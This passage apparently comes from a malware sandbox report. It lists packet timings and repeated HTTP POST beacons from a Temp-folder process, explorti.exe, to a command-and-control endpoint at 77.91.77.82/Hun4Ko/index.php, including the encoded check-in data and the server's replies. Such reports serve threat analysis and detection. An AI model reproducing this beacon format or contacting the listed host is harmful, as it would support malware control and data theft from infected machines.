                    Jul 5, 2024 05:10:14.643898964 CEST804974777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:14.644094944 CEST804974877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:14.644150972 CEST4974780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:14.644195080 CEST4974880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:14.644329071 CEST4974880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:14.649092913 CEST804974877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:16.303675890 CEST804974877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:16.303740978 CEST4974880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:16.303908110 CEST804974877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:16.303949118 CEST4974880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:16.304158926 CEST804974877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:16.304202080 CEST4974880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:16.304296017 CEST804974877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:16.304335117 CEST4974880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:16.305944920 CEST4974880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:16.311069012 CEST804974877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:16.527744055 CEST804974877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:16.527910948 CEST4974880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:16.638837099 CEST4974880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:16.639163017 CEST4974980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:16.644032001 CEST804974977.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:16.644093037 CEST804974877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:16.644139051 CEST4974980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:16.644180059 CEST4974880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:16.648510933 CEST4974980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:16.653409004 CEST804974977.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:17.363126040 CEST804974977.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:17.364792109 CEST4974980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:17.365453959 CEST4974980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:17.378010035 CEST804974977.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:17.594145060 CEST804974977.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:17.597193956 CEST4974980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:17.701242924 CEST4974980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:17.701550007 CEST4975080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:17.706352949 CEST804975077.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:17.706603050 CEST804974977.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:17.706680059 CEST4974980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:17.706784010 CEST4975080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:17.706784010 CEST4975080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:17.711558104 CEST804975077.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:18.398535967 CEST804975077.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:18.398586035 CEST4975080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:18.399399042 CEST4975080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:18.404227018 CEST804975077.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:18.616611958 CEST804975077.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:18.616667032 CEST4975080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:18.732526064 CEST4975080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:18.732827902 CEST4975180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:18.737637997 CEST804975177.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:18.737664938 CEST804975077.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:18.737716913 CEST4975180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:18.737747908 CEST4975080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:18.737929106 CEST4975180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:18.744024038 CEST804975177.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:19.432054043 CEST804975177.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:19.432142019 CEST4975180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:19.432748079 CEST4975180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:19.437473059 CEST804975177.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:19.648850918 CEST804975177.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:19.649019003 CEST4975180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:19.764137030 CEST4975180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:19.764446974 CEST4975280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:19.769289970 CEST804975277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:19.769361019 CEST4975280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:19.769368887 CEST804975177.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:19.769419909 CEST4975180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:19.769524097 CEST4975280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:19.774427891 CEST804975277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:20.471168995 CEST804975277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:20.471226931 CEST4975280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:20.473938942 CEST4975280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:20.478703022 CEST804975277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:20.691514969 CEST804975277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:20.697483063 CEST4975280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:20.810738087 CEST4975280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:20.811074018 CEST4975380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:20.815896988 CEST804975377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:20.815958023 CEST804975277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:20.816051960 CEST4975280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:20.816066980 CEST4975380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:20.816206932 CEST4975380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:20.820964098 CEST804975377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:21.551939964 CEST804975377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:21.552206993 CEST4975380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:21.552846909 CEST4975380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:21.557713985 CEST804975377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:21.780407906 CEST804975377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:21.780510902 CEST4975380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:21.888840914 CEST4975380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:21.889180899 CEST4975480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:21.894056082 CEST804975477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:21.894108057 CEST804975377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:21.894146919 CEST4975480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:21.894181967 CEST4975380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:21.894308090 CEST4975480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:21.901802063 CEST804975477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:22.605396032 CEST804975477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:22.605459929 CEST4975480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:22.606164932 CEST4975480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:22.610991001 CEST804975477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:22.831770897 CEST804975477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:22.831847906 CEST4975480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:22.935647964 CEST4975480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:22.935983896 CEST4975580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:22.940819025 CEST804975577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:22.940831900 CEST804975477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:22.940913916 CEST4975480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:22.940933943 CEST4975580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:22.941123962 CEST4975580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:22.945828915 CEST804975577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:23.662369013 CEST804975577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:23.665218115 CEST4975580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:23.670679092 CEST4975580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:23.675486088 CEST804975577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:23.896245003 CEST804975577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:23.896862030 CEST4975580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:23.998394966 CEST4975580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:23.998743057 CEST4975680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:24.003639936 CEST804975677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:24.003726959 CEST4975680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:24.003806114 CEST804975577.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:24.003859997 CEST4975580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:24.003942013 CEST4975680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:24.008718967 CEST804975677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:24.715133905 CEST804975677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:24.715202093 CEST4975680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:24.716074944 CEST4975680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:24.720973969 CEST804975677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:24.936079979 CEST804975677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:24.936160088 CEST4975680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:25.045131922 CEST4975680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:25.045445919 CEST4975780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:25.051914930 CEST804975777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:25.052051067 CEST4975780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:25.052228928 CEST804975677.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:25.052263975 CEST4975780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:25.052294016 CEST4975680192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:25.057046890 CEST804975777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:25.773075104 CEST804975777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:25.773169994 CEST4975780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:25.773895025 CEST4975780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:25.778839111 CEST804975777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:25.999701023 CEST804975777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:25.999815941 CEST4975780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:26.107532024 CEST4975780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:26.107863903 CEST4975880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:26.113071918 CEST804975777.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:26.113121033 CEST4975780192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:26.113328934 CEST804975877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:26.113400936 CEST4975880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:26.113531113 CEST4975880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:26.118309975 CEST804975877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:26.824183941 CEST804975877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:26.824348927 CEST4975880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:26.825114012 CEST4975880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:26.832118988 CEST804975877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:27.052367926 CEST804975877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:27.052484035 CEST4975880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:27.154323101 CEST4975880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:27.154623032 CEST4975980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:27.159535885 CEST804975977.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:27.159759045 CEST804975877.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:27.159853935 CEST4975880192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:27.159863949 CEST4975980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:27.159976006 CEST4975980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:27.164736032 CEST804975977.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:27.883590937 CEST804975977.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:27.883943081 CEST4975980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:27.884572983 CEST4975980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:27.889532089 CEST804975977.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:28.108021975 CEST804975977.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:28.108091116 CEST4975980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:28.216953039 CEST4975980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:28.217242002 CEST4976080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:28.223562002 CEST804976077.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:28.223678112 CEST4976080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:28.223853111 CEST804975977.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:28.223864079 CEST4976080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:28.223897934 CEST4975980192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:28.228595018 CEST804976077.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:28.925721884 CEST804976077.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:28.926812887 CEST4976080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:28.929181099 CEST4976080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:28.934020042 CEST804976077.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:29.146338940 CEST804976077.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:29.146397114 CEST4976080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:29.248369932 CEST4976080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:29.248667002 CEST4976180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:29.254534960 CEST804976177.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:29.254548073 CEST804976077.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:29.254609108 CEST4976080192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:29.254751921 CEST4976180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:29.254751921 CEST4976180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:29.259597063 CEST804976177.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:29.966687918 CEST804976177.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:29.966820002 CEST4976180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:29.967524052 CEST4976180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:29.972302914 CEST804976177.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:30.189443111 CEST804976177.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:30.189503908 CEST4976180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:30.295095921 CEST4976180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:30.295408964 CEST4976280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:30.301162004 CEST804976177.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:30.301175117 CEST804976277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:30.301215887 CEST4976180192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:30.301276922 CEST4976280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:30.301451921 CEST4976280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:30.306325912 CEST804976277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:31.029006958 CEST804976277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:31.030823946 CEST4976280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:31.031476021 CEST4976280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:31.036268950 CEST804976277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:31.258886099 CEST804976277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:31.262857914 CEST4976280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:31.373147964 CEST4976280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:31.373467922 CEST4976380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:31.378215075 CEST804976377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:31.378303051 CEST804976277.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:31.378304958 CEST4976380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:31.378350973 CEST4976280192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:31.378473043 CEST4976380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:31.383281946 CEST804976377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:32.081392050 CEST804976377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:32.081474066 CEST4976380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:32.082113028 CEST4976380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:32.086890936 CEST804976377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:32.302418947 CEST804976377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:32.302470922 CEST4976380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:32.404624939 CEST4976380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:32.405019045 CEST4976480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:32.409820080 CEST804976477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:32.409883022 CEST4976480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:32.409928083 CEST804976377.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:32.409974098 CEST4976380192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:32.410147905 CEST4976480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:32.415070057 CEST804976477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:33.105979919 CEST804976477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:33.106899977 CEST4976480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:33.107883930 CEST4976480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:33.112646103 CEST804976477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:33.325151920 CEST804976477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:33.325234890 CEST4976480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:33.436224937 CEST4976480192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:33.436466932 CEST4976580192.168.2.477.91.77.82
                    Jul 5, 2024 05:10:33.441250086 CEST804976477.91.77.82192.168.2.4
                    Jul 5, 2024 05:10:33.441262960 CEST804976577.91.77.82192.168.2.4
                    • 77.91.77.82
                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    0 | 192.168.2.4 | 49737 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:03.058995962 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:03.766336918 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:03.771302938 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:03.996983051 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    1 | 192.168.2.4 | 49738 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:04.113904953 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:04.820863962 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:04.822462082 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:05.046885014 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    2 | 192.168.2.4 | 49739 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:05.159713984 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:05.876519918 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:05.877672911 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:06.096573114 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    3 | 192.168.2.4 | 49740 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:06.206985950 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:06.908555031 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:06.909427881 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
